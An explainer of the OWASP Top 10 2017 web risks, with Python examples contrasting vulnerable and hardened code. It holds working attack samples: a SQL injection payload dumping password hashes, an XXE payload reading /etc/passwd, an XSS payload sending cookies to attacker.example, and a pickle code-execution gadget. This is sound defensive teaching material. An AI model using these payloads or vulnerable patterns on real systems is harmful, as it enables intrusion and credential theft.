OWASP stands for Open Web Application Security Project. It is a non-profit, open community whose goal is improving the security of software. Its best-known publication, the OWASP Top 10, is a widely used awareness document that lists the most critical web application security risks so that developers can secure the applications they develop and deploy.

OWASP Top 10 2017 Risk Categories:

1. Injection

This happens when untrusted data is sent to an interpreter (SQL, NoSQL, OS command, LDAP) as part of a command or query. The interpreter cannot tell where the data ends and the attacker's command begins, so it executes the injected command or returns data it should not.

Impact:

  • Compromise of the application or underlying host
  • Exposure of sensitive data
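As an added example (not code from the OWASP page), the classic SQL case in Python against an in-memory sqlite3 database constructed for the demo: the first function builds the query by string concatenation, the second binds the value as a parameter. The table names, rows and payload are invented for illustration.

```python
import sqlite3

def make_sample_db() -> sqlite3.Connection:
    """Constructed in-memory database for the demo (not real data)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products (name TEXT, category TEXT);
        CREATE TABLE users (username TEXT, password_hash TEXT);
        INSERT INTO products VALUES ('laptop', 'electronics'), ('desk', 'furniture');
        INSERT INTO users VALUES ('alice', 'hash-of-alice-pw'), ('bob', 'hash-of-bob-pw');
    """)
    return conn

def products_vulnerable(conn: sqlite3.Connection, category: str) -> list:
    """Untrusted input is concatenated into the SQL text, so the interpreter
    cannot distinguish the attacker's SQL from the application's."""
    sql = f"SELECT name, category FROM products WHERE category = '{category}'"
    return conn.execute(sql).fetchall()

def products_safe(conn: sqlite3.Connection, category: str) -> list:
    """Parameterised query: the value is bound separately from the statement,
    so quotes, UNION and comment markers inside it are just characters."""
    sql = "SELECT name, category FROM products WHERE category = ?"
    return conn.execute(sql, (category,)).fetchall()

# Classic UNION payload: closes the string literal, appends a second SELECT
# over a table the caller should never see, and comments out the trailing
# quote that the application adds.
PAYLOAD = "' UNION SELECT username, password_hash FROM users --"

if __name__ == "__main__":
    db = make_sample_db()
    print("vulnerable:", products_vulnerable(db, PAYLOAD))
    print("safe:      ", products_safe(db, PAYLOAD))
```

With the payload, the vulnerable function returns every row of the users table; the parameterised one returns nothing because no category is literally named `' UNION SELECT ...`.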

2. Broken Authentication

This happens when authentication and session management are implemented incorrectly (for example session tokens that never expire, weak or default passwords, no defence against credential stuffing or brute force), which allows attackers to compromise passwords, keys or session tokens and assume other users' identities.

Impact:

  • User identity theft
  • Compromise of sensitive data
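An added example, not from the OWASP page, of the session-management side in Python: a hypothetical in-memory SessionStore that issues a random token on every login, enforces both an idle timeout and an absolute lifetime, and invalidates expired sessions on the server. The limits, the store itself and the FakeClock used to drive expiry are assumptions made for the demo.

```python
import secrets
import time

IDLE_TIMEOUT = 15 * 60        # seconds without activity before a session dies
ABSOLUTE_LIFETIME = 8 * 3600  # seconds after login after which it dies regardless

class SessionStore:
    """Hypothetical server-side session store (not a framework API).
    `clock` is injectable so expiry can be exercised without sleeping."""

    def __init__(self, clock=time.time):
        self._sessions = {}   # token -> {"user", "created", "last_seen"}
        self._clock = clock

    def login(self, user: str) -> str:
        # New 256-bit random token on every login. Never reuse a token the
        # client presented before authenticating (session fixation).
        token = secrets.token_urlsafe(32)
        now = self._clock()
        self._sessions[token] = {"user": user, "created": now, "last_seen": now}
        return token

    def user_for(self, token: str):
        """Return the user bound to `token`, or None if unknown or expired."""
        sess = self._sessions.get(token)
        if sess is None:
            return None
        now = self._clock()
        if (now - sess["created"] > ABSOLUTE_LIFETIME
                or now - sess["last_seen"] > IDLE_TIMEOUT):
            del self._sessions[token]   # expired: drop it server-side
            return None
        sess["last_seen"] = now
        return sess["user"]

    def logout(self, token: str) -> None:
        # Logout must invalidate on the server, not merely clear the cookie.
        self._sessions.pop(token, None)

class FakeClock:
    """Controllable clock for the demo."""
    def __init__(self, start: float = 1_700_000_000.0):
        self.now = start
    def __call__(self) -> float:
        return self.now
    def advance(self, seconds: float) -> None:
        self.now += seconds

def demo() -> dict:
    clock = FakeClock()
    store = SessionStore(clock)
    tok = store.login("alice")
    valid_now = store.user_for(tok) == "alice"

    clock.advance(IDLE_TIMEOUT + 1)              # user walked away
    idle_expired = store.user_for(tok) is None

    tok = store.login("alice")
    for _ in range(40):                          # active all day: 40 x 14 min > 8 h
        clock.advance(14 * 60)
        result = store.user_for(tok)
    absolute_expired = result is None

    return {"valid_now": valid_now, "idle_expired": idle_expired,
            "absolute_expired": absolute_expired,
            "unknown_rejected": store.user_for("not-a-token") is None}
```

The absolute lifetime is the part most often missing: without it, a token stolen from a user who stays active (a shared workstation, a leaked cookie) works forever.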

3. Sensitive Data Exposure

This happens when sensitive data (credentials, card numbers, health or personal records) is stored or transmitted without adequate protection, such as encryption at rest or in transit, or with weak algorithms or poor key management, so attackers can steal or modify it.

Impact:

  • Compromise of regulated data (e.g., health records under HIPAA or personal data under GDPR)
  • Non-compliant status under privacy laws and regulations
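One concrete case of data at rest, as an added Python example that is not from the page: storing passwords as salted PBKDF2 hashes instead of plaintext, using only the standard library. The storage format and helper names are choices made for this example; the iteration count of 600,000 follows the OWASP Password Storage Cheat Sheet figure for PBKDF2-HMAC-SHA256.

```python
import hashlib
import hmac
import os

ITERATIONS = 600_000   # OWASP Password Storage Cheat Sheet figure for PBKDF2-HMAC-SHA256

def hash_password(password: str) -> str:
    """Salted, deliberately slow hash. A breached users table then yields
    per-user salted hashes rather than reusable passwords.
    Stored as: pbkdf2_sha256$<iterations>$<salt hex>$<digest hex>"""
    salt = os.urandom(16)   # unique per user, stored alongside the digest
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)
    return f"pbkdf2_sha256${ITERATIONS}${salt.hex()}${digest.hex()}"

def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and iteration count; compare in constant time."""
    try:
        algo, iterations, salt_hex, digest_hex = stored.split("$")
    except ValueError:
        return False                      # malformed or legacy plaintext record
    if algo != "pbkdf2_sha256":
        return False
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                                 bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(digest, bytes.fromhex(digest_hex))

def needs_rehash(stored: str) -> bool:
    """Call after a successful login so old records are upgraded in place
    whenever the iteration count is raised."""
    algo, iterations, _, _ = stored.split("$")
    return algo != "pbkdf2_sha256" or int(iterations) < ITERATIONS
```

Two hashes of the same password differ because of the per-user salt, which is what defeats precomputed (rainbow) tables; the slow iteration count is what makes offline guessing expensive.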

4. XML External Entities

This happens when XML input containing a reference to an external entity is processed by an older or poorly configured XML parser. The parser resolves the entity, which attackers use to read local files, make the server issue requests to internal systems (SSRF), or exhaust resources through entity expansion; in some configurations it can lead to remote code execution.

Impact:

  • Theft of sensitive data
  • Denial of Service Attacks (DoS)
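An added example, not from the page, of the defensive configuration in Python using the standard-library expat parser: the parser is told to reject any DOCTYPE before it can act on an entity declaration, which removes the XXE class outright. The helper and the payload are constructed for the demo. Python's expat does not fetch external entities by itself, so the block shows the hardening pattern rather than a working exploit; the equivalent switch (disallow DOCTYPE, or disable external entities and DTD processing) exists in most other parsers.

```python
import xml.parsers.expat

class UnsafeXMLError(ValueError):
    """Raised when untrusted XML carries a DOCTYPE (where entities are declared)."""

def parse_untrusted_xml(data: bytes) -> dict:
    """Parse a flat XML record from an untrusted source, refusing any DOCTYPE.

    Hypothetical hardening helper (not from the OWASP page). Every XXE payload
    needs a DOCTYPE to declare its entity, so rejecting the declaration before
    the parser acts on it closes the whole class: no file reads, no outbound
    requests, no entity-expansion DoS. Returns {leaf element name: text}.
    """
    parser = xml.parsers.expat.ParserCreate()
    result = {}
    buf = []

    def start_doctype(name, sysid, pubid, has_internal_subset):
        # An exception raised inside a handler aborts Parse() and propagates.
        raise UnsafeXMLError(f"DOCTYPE {name!r} rejected: possible XXE")

    def start_element(name, attrs):
        buf.clear()

    def char_data(text):
        buf.append(text)          # expat may deliver text in several chunks

    def end_element(name):
        content = "".join(buf).strip()
        if content:
            result[name] = content
        buf.clear()

    parser.StartDoctypeDeclHandler = start_doctype
    parser.StartElementHandler = start_element
    parser.CharacterDataHandler = char_data
    parser.EndElementHandler = end_element
    parser.Parse(data, True)
    return result

def is_rejected(data: bytes) -> bool:
    """True if the document was refused for carrying a DOCTYPE."""
    try:
        parse_untrusted_xml(data)
    except UnsafeXMLError:
        return True
    return False

# Constructed inputs for the demo.
BENIGN = b"<user><name>alice</name><role>viewer</role></user>"

# Classic XXE payload: declares an external entity that points at a local
# file and references it where the application expects a name.
XXE = (b'<?xml version="1.0"?>'
       b'<!DOCTYPE user [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
       b"<user><name>&xxe;</name></user>")
```

If the application genuinely needs DTDs, the narrower setting is to keep DOCTYPE but refuse external entity resolution and cap entity expansion; rejecting DOCTYPE entirely is the simpler and safer default for data from clients.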

5. Broken Access Control

This happens when restrictions on what authenticated users are allowed to do are not properly enforced, allowing attackers to act as other users or administrators, read or modify other users' records, or change access rights.

Impact:

  • Compromise of sensitive data
  • Modification or Deletion of data
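An added Python example (not from the page) of the most common form, an insecure direct object reference: the vulnerable handler checks only that the caller is logged in, while the safe one also checks ownership or an admin role and answers foreign and non-existent ids identically. The invoice records, roles and function names are constructed for the demo.

```python
# Constructed data: invoices owned by different users, and a role table.
INVOICES = {
    101: {"owner": "alice", "total": 120.00},
    102: {"owner": "bob",   "total": 980.50},
}
ROLES = {"alice": "customer", "bob": "customer", "carol": "admin"}

class Forbidden(Exception):
    pass

def get_invoice_vulnerable(user: str, invoice_id: int) -> dict:
    """Checks that the caller is logged in, but never that the invoice is
    theirs: alice fetches bob's invoice by changing the number in the URL."""
    if user not in ROLES:
        raise Forbidden("login required")
    return INVOICES[invoice_id]

def get_invoice_safe(user: str, invoice_id: int) -> dict:
    """Deny by default: the record must belong to the caller, or the caller
    must hold the admin role. Unknown ids and other users' ids get the same
    answer so the response does not reveal which ids exist."""
    if user not in ROLES:
        raise Forbidden("login required")
    invoice = INVOICES.get(invoice_id)
    if invoice is None or (invoice["owner"] != user and ROLES[user] != "admin"):
        raise Forbidden("not found")
    return invoice

def can_read(user: str, invoice_id: int) -> bool:
    """Convenience wrapper so the outcome of the safe check is a plain bool."""
    try:
        get_invoice_safe(user, invoice_id)
    except Forbidden:
        return False
    return True
```

The check belongs on the server, next to the data access, and must not depend on the client hiding the link: the attacker's browser does not run the UI's restrictions.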

6. Security Misconfiguration

This happens when the application or its platform is insecurely configured: unnecessary services, ports or features left enabled, default accounts with unchanged passwords, unpatched frameworks or services, overly permissive storage or cloud permissions, or verbose error messages that reveal stack traces. Such flaws give attackers information about the deployment and frequently a way onto the server to disrupt operations.

Impact:

  • Compromise of System
  • Information Disclosure
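One of the listed flaws, a stack trace reaching the client, as an added Python example that is not from the page: a debug-style error handler that returns the traceback, beside a hardened one that returns a generic message with a correlation id and logs the detail server-side. The failing function and handler names are constructed for the demo.

```python
import logging
import traceback
import uuid

logger = logging.getLogger("app")

def load_user(user_id: int) -> dict:
    """Constructed failing operation so the handlers have a real traceback."""
    raise RuntimeError(f"query failed: SELECT * FROM users WHERE id = {user_id}")

def handle_error_vulnerable(exc: BaseException) -> tuple:
    """Debug-style handler left on in production: file paths, function names
    and the failing SQL go straight to whoever triggered the error."""
    detail = "".join(traceback.format_exception(type(exc), exc, exc.__traceback__))
    return 500, "Internal Server Error\n" + detail

def handle_error_safe(exc: BaseException) -> tuple:
    """Hardened: the client gets a generic message plus a correlation id; the
    full trace goes to the server log under that id so support can find it."""
    incident = uuid.uuid4().hex[:12]
    logger.error("unhandled error, incident %s", incident, exc_info=exc)
    return 500, f"Internal Server Error (reference {incident})"

def simulate_request(handler) -> tuple:
    """Run the request path and route any failure through `handler`.
    Returns (status, body) as a framework's error hook would."""
    try:
        return 200, str(load_user(42))
    except Exception as exc:
        return handler(exc)
```

The same principle applies to the rest of the list: verbose output (debug pages, directory listings, server banners) is valuable to an attacker mapping the deployment and costs the defender nothing to turn off.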

7. Cross-site scripting

This happens when untrusted data is included in a web page without proper validation or escaping (reflected from the request, stored in the application, or inserted into the DOM by the page's own JavaScript), or when users are lured into clicking crafted links. The attacker's script then runs in the victim's browser with the page's origin, where it can hijack sessions, deface the site or redirect the user to malicious sites.

Impact:

  • Takeover of the victim's account in the application
  • Compromise of data
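An added Python example (not from the page) of output encoding for the two contexts that account for most XSS bugs, HTML text and an href attribute, plus the cookie flags that limit the damage if a script does run. The payload and the hypothetical rendering functions are constructed for the demo.

```python
import html
from urllib.parse import urlsplit

def render_comment_vulnerable(comment: str) -> str:
    """Stored XSS: user-supplied text placed into the page as-is."""
    return f'<div class="comment">{comment}</div>'

def render_comment_safe(comment: str) -> str:
    """Output-encode for the HTML text context: the browser shows the payload
    as literal text instead of parsing it as markup."""
    return f'<div class="comment">{html.escape(comment)}</div>'

def render_link_safe(url: str, label: str) -> str:
    """Attribute context needs more than escaping: an escaped
    'javascript:alert(1)' still executes when clicked, so allow only
    http(s) schemes, then escape for the quoted-attribute context."""
    if urlsplit(url).scheme not in ("http", "https"):
        url = "#"
    return f'<a href="{html.escape(url, quote=True)}">{html.escape(label)}</a>'

def session_cookie(token: str) -> str:
    """Defence in depth for the session: HttpOnly keeps document.cookie from
    reading it even if a script does run; Secure and SameSite limit exposure."""
    return f"session={token}; Path=/; HttpOnly; Secure; SameSite=Lax"

# Constructed payload: exfiltrates the session cookie to an attacker host.
PAYLOAD = "<script>new Image().src='https://attacker.example/?c='+document.cookie</script>"
```

Encoding must match the context the data lands in (HTML body, attribute, URL, JavaScript string); a single escaping function applied everywhere is the usual source of the bypasses.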

8. Insecure Deserialization

This happens when an application deserializes untrusted data into objects without verifying its source or contents. Many languages and frameworks run object construction code (constructors, magic methods, custom reduce hooks) during deserialization, so attacker-controlled serialized data can lead to remote code execution; even where it cannot, it enables replay, privilege escalation and injection attacks.

Impact:

  • Remote Code Execution
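An added Python example, not from the page, of the mechanism with pickle: the serialized bytes name a callable and its arguments, and pickle.loads calls it before the application sees any object. The gadget here creates a directory so the demo can prove execution happened (a real payload would name os.system or subprocess.Popen instead). Beside it are a restricted unpickler with an allowlist and the preferred fix, a data-only format with schema validation. The class and function names, marker path and role list are constructed for the demo.

```python
import io
import json
import os
import pickle
import shutil
import tempfile

# Side-effect marker so the demo can prove code ran during deserialization.
MARKER = os.path.join(tempfile.gettempdir(), f"owasp-a8-demo-{os.getpid()}")

class Gadget:
    """Attacker-side object. __reduce__ tells the unpickler how to 'rebuild'
    it: call os.makedirs(MARKER). A real payload names os.system or
    subprocess.Popen with a shell command; the mechanism is identical."""
    def __reduce__(self):
        return (os.makedirs, (MARKER,))

def build_payload() -> bytes:
    return pickle.dumps(Gadget())

def load_vulnerable(data: bytes):
    """Unrestricted pickle.loads: runs whatever callable the bytes name."""
    return pickle.loads(data)

class RestrictedUnpickler(pickle.Unpickler):
    """Allowlist of globals the data may reference; anything else is refused
    before it can be called."""
    ALLOWED = {("builtins", "dict"), ("builtins", "list"), ("builtins", "tuple")}

    def find_class(self, module, name):
        if (module, name) not in self.ALLOWED:
            raise pickle.UnpicklingError(f"forbidden global {module}.{name}")
        return super().find_class(module, name)

def load_restricted(data: bytes):
    return RestrictedUnpickler(io.BytesIO(data)).load()

ALLOWED_ROLES = {"viewer", "editor"}

def load_profile_json(data: bytes) -> dict:
    """Preferred fix: a data-only format plus schema validation. JSON cannot
    name a callable, so there is nothing for the loader to execute."""
    obj = json.loads(data)
    if not isinstance(obj, dict) or set(obj) != {"user", "role"}:
        raise ValueError("unexpected shape")
    if not isinstance(obj["user"], str) or obj["role"] not in ALLOWED_ROLES:
        raise ValueError("bad field")
    return obj

def run_demo() -> dict:
    """Show that the same bytes execute under pickle.loads and are refused
    by the restricted unpickler without executing."""
    payload = build_payload()
    shutil.rmtree(MARKER, ignore_errors=True)
    load_vulnerable(payload)
    vulnerable_executed = os.path.isdir(MARKER)
    shutil.rmtree(MARKER, ignore_errors=True)
    try:
        load_restricted(payload)
        restricted_blocked = False
    except pickle.UnpicklingError:
        restricted_blocked = True
    restricted_executed = os.path.isdir(MARKER)
    shutil.rmtree(MARKER, ignore_errors=True)
    return {"vulnerable_executed": vulnerable_executed,
            "restricted_blocked": restricted_blocked,
            "restricted_executed": restricted_executed}
```

The allowlist unpickler is a mitigation for code that cannot change format yet; it is only as safe as the allowlist, so the JSON path is the one to aim for.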

9. Using components with known vulnerabilities

This happens when an application uses libraries, frameworks or other software components (open source or third-party) that have known vulnerabilities. Because components run with the same privileges as the application, an exploitable component lets attackers compromise the whole application.

Impact:

  • Remote Code Execution
  • Compromise of application

10. Insufficient Logging and Monitoring

This happens when security-relevant events (logins, failed logins, access-control failures, high-value transactions) are not logged in enough detail to reconstruct what an attacker did, and when monitoring is inadequate (alert thresholds too loose, no timely alerting, no incident response process). Attackers rely on this to probe the application, establish persistence and pivot to other systems without being detected.

Impact:

  • Attacks continue undetected, giving attackers time to gain further access
  • Compromise of Data
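An added Python example (not from the page) of what adequate logging and alerting look like: structured login events carrying user, source address, outcome and timestamp, and a sliding-window detector that alerts on a burst of failures from one source and on a success that follows such a burst. The log lines, thresholds, field names and rule names are constructed for the demo.

```python
import json
from collections import defaultdict, deque
from datetime import datetime

WINDOW_SECONDS = 300   # sliding window for counting failures
FAIL_THRESHOLD = 5     # failures from one source inside the window that trigger an alert

# Constructed sample of structured authentication events, one JSON object per
# line. Each carries what an investigator needs: when, who, from where, outcome.
SAMPLE_LOG = """\
{"ts": "2024-03-01T10:00:01Z", "event": "login_failed", "user": "alice", "src": "203.0.113.9"}
{"ts": "2024-03-01T10:00:03Z", "event": "login_failed", "user": "bob", "src": "203.0.113.9"}
{"ts": "2024-03-01T10:00:04Z", "event": "login_failed", "user": "carol", "src": "203.0.113.9"}
{"ts": "2024-03-01T10:00:06Z", "event": "login_failed", "user": "dave", "src": "203.0.113.9"}
{"ts": "2024-03-01T10:00:07Z", "event": "login_failed", "user": "erin", "src": "203.0.113.9"}
{"ts": "2024-03-01T10:00:09Z", "event": "login_ok", "user": "frank", "src": "203.0.113.9"}
{"ts": "2024-03-01T10:01:00Z", "event": "login_failed", "user": "alice", "src": "198.51.100.7"}
{"ts": "2024-03-01T10:20:00Z", "event": "login_ok", "user": "alice", "src": "192.0.2.55"}
"""

def parse_events(text: str) -> list:
    """Parse JSON-lines events; timestamps become timezone-aware datetimes."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        ev["ts"] = datetime.fromisoformat(ev["ts"].replace("Z", "+00:00"))
        events.append(ev)
    return events

def detect(events: list) -> list:
    """Two rules over a per-source sliding window:
    brute_force: at least FAIL_THRESHOLD failures within WINDOW_SECONDS;
    success_after_brute_force: a login_ok from a source still over threshold,
    i.e. the guess that worked."""
    recent = defaultdict(deque)   # src -> timestamps of failures inside the window
    alerted = set()               # sources already reported for brute force
    alerts = []
    for ev in sorted(events, key=lambda e: e["ts"]):
        src, ts = ev["src"], ev["ts"]
        window = recent[src]
        while window and (ts - window[0]).total_seconds() > WINDOW_SECONDS:
            window.popleft()                     # slide the window forward
        if ev["event"] == "login_failed":
            window.append(ts)
            if len(window) >= FAIL_THRESHOLD and src not in alerted:
                alerted.add(src)
                alerts.append({"rule": "brute_force", "src": src,
                               "failures": len(window), "at": ts.isoformat()})
        elif ev["event"] == "login_ok" and len(window) >= FAIL_THRESHOLD:
            alerts.append({"rule": "success_after_brute_force", "src": src,
                           "user": ev["user"], "at": ts.isoformat()})
    return alerts

def run_detection() -> list:
    return detect(parse_events(SAMPLE_LOG))
```

The second rule is the one worth paging on: five failures followed by a success from the same address is an account that has most likely just been taken over, and without the source address and outcome in the log it cannot be written at all.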